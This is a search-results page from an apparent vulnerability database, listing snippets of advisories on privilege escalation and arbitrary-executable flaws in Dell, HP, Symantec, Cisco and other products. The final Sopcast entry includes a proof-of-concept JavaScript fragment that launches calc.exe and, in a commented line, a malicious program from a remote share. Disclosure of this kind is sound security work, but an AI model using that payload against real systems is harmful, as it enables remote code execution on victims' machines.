108 matches found
Design/Logic Flaw
Dell Digital Delivery versions prior to 3.5.2015 contain an incorrect default permissions vulnerability. A locally authenticated low-privileged malicious user could exploit this vulnerability to run an arbitrary executable with administrative privileges on the affected system...
HP System Event Utility Local Privilege Escalation
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/HP-SYSTEM-EVENT-UTILITY-LOCAL-PRIVILEGE-ESCALATION.txt + twitter.com/hyp3rlinx + ISR: ApparitionSec Vendor www.hp.com Product HP System Event Utility The genuine HPMSGSVC.exe...
Symantec Endpoint Protection ccSvc Missing Authentication Privilege Escalation Vulnerability
This vulnerability allows local attackers to escalate privileges on affected installations of Symantec Endpoint Protection. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the...
Symantec Endpoint Protection ccJobMgr Missing Authentication Privilege Escalation Vulnerability
This vulnerability allows local attackers to escalate privileges on affected installations of Symantec Endpoint Protection. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the...
Symantec Endpoint Protection Manager OpenSSL Privilege Escalation Vulnerability
This vulnerability allows local attackers to escalate privileges on affected installations of Symantec Endpoint Protection Manager. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within...
Symantec Endpoint Protection Manager LuComServer stDisScriptEngine Privilege Escalation Vulnerability
This vulnerability allows local attackers to escalate privileges on affected installations of Symantec Endpoint Protection Manager. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within...
PT-2019-6468 · Solarwinds · Dameware Mini Remote Control
Name of the Vulnerable Software and Affected Versions: DameWare Mini Remote Control version 12.1.0.89 Description: The issue allows an unauthenticated, remote attacker to request smart card login and upload and execute an arbitrary executable run under the Local System account. This is due to a...
CVE-2019-5981
Improper authorization vulnerability in VAIO Update 7.3.0.03150 and earlier allows an attackers to execute arbitrary executable file with administrative privilege via unspecified vectors...
Sony VAIO Update License Issue Vulnerability
Sony VAIO Update is a system update utility that comes pre-installed in Sony VAIO computers from Sony Japan. An authorization issue vulnerability exists in Sony VAIO Update 7.3.0.03150 and prior versions. The vulnerability stems from a lack of authentication measures or insufficient authenticatio...
Schneider Electric Pro-face GP-Pro EX
1. EXECUTIVE SUMMARY CVSS v3 9.0 ATTENTION: Exploitable remotely/low skill level to exploit Vendor: Schneider Electric Equipment: Pro-face GP-Pro EX Vulnerability: Improper Input Validation 2. RISK EVALUATION Successful exploitation of this vulnerability could allow an attacker to modify code to...
Input validation
An Improper Input Validation vulnerability exists in Pro-Face GP-Pro EX v4.08 and previous versions which could cause the execution arbitrary executable when GP-Pro EX is launched...
Brave Software: Download of (later executed) .NET installer over insecure channel
NOTE! Thanks for submitting a report! Please fill all sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to verify and then potentially issue a bounty. Summary: Execution of file NDP-KB2901954-Web.exe fetched via...
CVE-2016-9192
A vulnerability in Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to install and execute an arbitrary executable file with privileges equivalent to the Microsoft Windows operating system SYSTEM account. More Information: CSCvb68043. Known Affected...
Design/Logic Flaw
A vulnerability in Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to install and execute an arbitrary executable file with privileges equivalent to the Microsoft Windows operating system SYSTEM account. More Information: CSCvb68043. Known Affected...
CVE-2016-9192
A vulnerability in Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to install and execute an arbitrary executable file with privileges equivalent to the Microsoft Windows operating system SYSTEM account. More Information: CSCvb68043. Known Affected...
Cisco AnyConnect Secure Mobility Client Local Privilege Escalation Vulnerability
A vulnerability in Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to install and execute an arbitrary executable file with privileges equivalent to the Microsoft Windows operating system SYSTEM account. The vulnerability is due to incorrect...
Cisco AnyConnect Secure Mobility Client for Linux and Mac OS X Privilege Escalation Vulnerability
A vulnerability in the code responsible for the self-updating feature of Cisco AnyConnect Secure Mobility Client for Linux and the Cisco AnyConnect Secure Mobility Client for Mac OS X could allow an authenticated, local attacker to execute an arbitrary executable file of its choosing with...
kpopup 0.9.x Privileged Command Execution Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/8915/info It has been alleged that it is possible for local attackers to gain root privileges through kpopup, which is is installed setuid root by default. According to the report, kpopup uses the system3 C-library functi...
HP Client Automation radexecd.exe Remote Command Execution
The HP Client Automation service on the remote port is affected by a command execution vulnerability. The vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP Client Automation. Authentication is not required to exploit the vulnerability. The flaw exis...
Sopcast SopCore Control Command Execution
window.onload=function SopPlayer.InitPlayer; //SopPlayer.SetExternalPlayer"\\192.168.0.1\c$\PATH\TO\MALICIOUSPROGRAM.EXE"; SopPlayer.SetExternalPlayer"c:\WINDOWS\system32\calc.exe"; SopPlayer.SetSopAddress"sop://broker.sopcast.com:3912/6002"; //A LIVE CHANNEL...